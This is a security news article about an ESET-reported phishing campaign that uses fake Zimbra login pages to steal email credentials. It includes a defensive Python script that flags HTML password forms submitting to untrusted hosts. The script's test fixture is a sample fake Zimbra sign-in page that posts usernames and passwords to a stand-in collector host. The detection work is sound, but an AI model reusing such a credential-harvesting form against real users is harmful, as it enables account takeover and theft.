Slovak software company ESET discovered a vast phishing campaign targeting several Zimbra users across Europe and South America.
What is Zimbra Collaboration?
LiquidSys originally developed Zimbra Collaboration Suite (ZCS) and, on July 26, 2005, changed its name to Zimbra Inc. ZCS is a set of email and collaboration software tools designed to improve communication and collaboration in organizations.
It has features like email, calendars, contacts, tasks and file sharing. The suite is well known for its web-based interface and supports various clients, including desktop email clients, mobile devices, and web browsers.
Zimbra Collaboration comes in various editions, including open-source editions and commercial editions with additional features and support options. It can be deployed on-premises or in the cloud, offering flexibility in how organizations choose to implement and manage their collaboration infrastructure.
This open-platform solution allows users to manage and control their data the way they want, and to keep it secure and private at the same time. Because it's integrable and customisable, users can pay only for the features they need for the time being and add more as their business grows. They can integrate their email with desktop clients such as Apple Mail, Thunderbird, and Outlook.
Phishing Campaign Compromised Users’ Accounts
Countless business and individual users of Zimbra have been compromised as hackers accessed their accounts through a phishing scam. Phishing is the practice of sending emails or other messages that pose as credible companies in order to convince users to disclose personal information. These details may include passwords or credit card numbers and CVV.
The fraudulent scheme has been ongoing since April of this year. It targets various small and medium businesses and government bodies. Based on research, the biggest number of targets are in Poland. Victims in other European countries, such as France, Ukraine, the Netherlands, and Italy, were not spared either. In Latin America, Ecuador leads the list of identified targets.
Usually, the target receives an email with a phishing page in the linked HTML file. The email warns the recipient of an email server update, deactivation of the account, or a similar issue. The file then presents the user with a fake Zimbra login page tailored to the targeted organisation.
The hackers collect the victim's information from the HTML form and gain control over the affected email account. They could also compromise the victim's administrator accounts and create new mailboxes that they can use to send phishing emails to other targets.
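The lure described above is a local HTML file carrying a login form, which a mail filter or analyst can check for statically. The following is an added example, not code from ESET or Zimbra: it flags password forms in an HTML file that submit anywhere other than the organisation's own mail host. The host names, the `trusted_hosts` parameter and the sample file are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAudit(HTMLParser):
    """Record each <form>'s action URL and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []    # one dict per form: {"action": str, "password": bool}
        self._open = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": (a.get("action") or "").strip(), "password": False}
            self.forms.append(self._open)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._open is None:  # password box outside any <form>
                self._open = {"action": "", "password": False}
                self.forms.append(self._open)
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_html(html, trusted_hosts):
    """Return one finding per password form that does not post to a trusted host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue  # search boxes, newsletter sign-ups, etc. are ignored
        host = (urlparse(form["action"]).hostname or "").lower()
        if not host:
            findings.append("password field without an absolute form action")
        elif host not in trusted_hosts:
            findings.append(f"password form posts to untrusted host {host}")
    return findings

# Constructed sample: a fake "Zimbra" sign-in page as it might arrive by email.
SAMPLE_PHISH = """<html><title>Zimbra Web Client Sign In</title><body>
<form method="post" action="https://collector.example.net/save.php">
<input type="text" name="username" value="user@example.org">
<input type="password" name="password"><input type="submit"></form></body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PHISH, {"mail.example.org"}):
        print(finding)
```

A finding here is a triage signal rather than a verdict: pages that build or submit the form from script need dynamic analysis as well.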
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries,” ESET said.
A number of phishing emails were sent from Zimbra accounts of previously targeted, authorised companies. It's uncertain how administrator accounts were phished; however, ESET believed that using the same password for both email and administration could be the reason.